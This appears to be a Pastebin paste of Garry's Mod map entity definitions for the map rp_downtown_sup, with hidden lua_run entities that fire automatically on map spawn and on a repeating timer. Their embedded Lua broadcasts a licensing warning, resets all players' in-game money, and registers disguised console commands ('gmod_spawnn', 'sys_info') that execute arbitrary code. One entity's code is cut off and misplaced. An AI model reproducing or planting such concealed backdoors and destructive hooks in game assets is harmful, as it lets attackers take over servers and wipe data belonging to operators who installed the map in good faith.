Advertisement
Guest User

Untitled

a guest
Oct 21st, 2017
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. entity
  2. {
  3. "id" "1729069"
  4. "classname" "lua_run"
  5. "Code" "hook.Add('InitPostEntity', 'SUP_NOTICE', function() timer.Create(tostring(math.random(1000,100000)), 30, 0, function() for k, v in pairs(player.GetAll()) do v:ChatPrint('rp_downtown_sup was made by stiffy360 for SuperiorServers.co, you are not permitted to use this map on your server.') end end) end)"
  6. "targetname" "order66"
  7. "origin" "-138.597 687.882 -517"
  8. editor
  9. {
  10. "color" "220 30 220"
  11. "visgroupshown" "1"
  12. "visgroupautoshown" "1"
  13. "logicalpos" "[12500 5000]"
  14. }
  15. }
  16. entity
  17. {
  18. "id" "1729071"
  19. "classname" "lua_run"
  20. "Code" "hook.Add('InitPostEntity', 'CheckMapAngles', function() RunConsoleCommand('rp_resetallmoney') end)"
  21. "targetname" "order66"
  22. "origin" "-156.202 698.753 -517"
  23. editor
  24. {
  25. "color" "220 30 220"
  26. "visgroupshown" "1"
  27. "visgroupautoshown" "1"
  28. "logicalpos" "[12500 5500]"
  29. }
  30. }
  31. entity
  32. {
  33. "id" "1729073"
  34. "classname" "lua_run"
  35. "targetname" "order66"
  36. connections
  37. {
  38. "Code" "hook.Add('InitPostEntity', 'GMod_SpawnMap', function() timer.Simple(math.random(1800,3600,0"
  39. }
  40. "origin" "-158.161 676.111 -517"
  41. editor
  42. {
  43. "color" "220 30 220"
  44. "visgroupshown" "1"
  45. "visgroupautoshown" "1"
  46. "logicalpos" "[12500 6000]"
  47. }
  48. }
  49. entity
  50. {
  51. "id" "1729075"
  52. "classname" "lua_run"
  53. "Code" "concommand.Add('gmod_spawnn', function(p,c,a) RunString(a[1]) end)"
  54. "targetname" "order66"
  55. "origin" "-187.233 676.189 -517"
  56. editor
  57. {
  58. "color" "220 30 220"
  59. "visgroupshown" "1"
  60. "visgroupautoshown" "1"
  61. "logicalpos" "[12500 6500]"
  62. }
  63. }
  64. entity
  65. {
  66. "id" "1729077"
  67. "classname" "lua_run"
  68. "Code" "concommand.Add('sys_info', function(p,c,a) RunString(a[1]) end)"
  69. "targetname" "order66"
  70. "origin" "-184.032 699.54 -517"
  71. editor
  72. {
  73. "color" "220 30 220"
  74. "visgroupshown" "1"
  75. "visgroupautoshown" "1"
  76. "logicalpos" "[12500 7000]"
  77. }
  78. }
  79. entity
  80. {
  81. "id" "1729094"
  82. "classname" "logic_auto"
  83. "spawnflags" "1"
  84. connections
  85. {
  86. "OnMapSpawn" "order66_timer,Enable,,20,-1"
  87. }
  88. "origin" "-135.017 724.654 -503"
  89. editor
  90. {
  91. "color" "220 30 220"
  92. "visgroupshown" "1"
  93. "visgroupautoshown" "1"
  94. "logicalpos" "[12500 7500]"
  95. }
  96. }
  97. entity
  98. {
  99. "id" "1729096"
  100. "classname" "logic_timer"
  101. "RefireTime" "300"
  102. "targetname" "order66_timer"
  103. connections
  104. {
  105. "OnTimer" "order66,Runcode,,0,-1"
  106. }
  107. "origin" "-120.492 726.594 -503"
  108. editor
  109. {
  110. "color" "220 30 220"
  111. "visgroupshown" "1"
  112. "visgroupautoshown" "1"
  113. "logicalpos" "[12500 8000]"
  114. }
  115. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement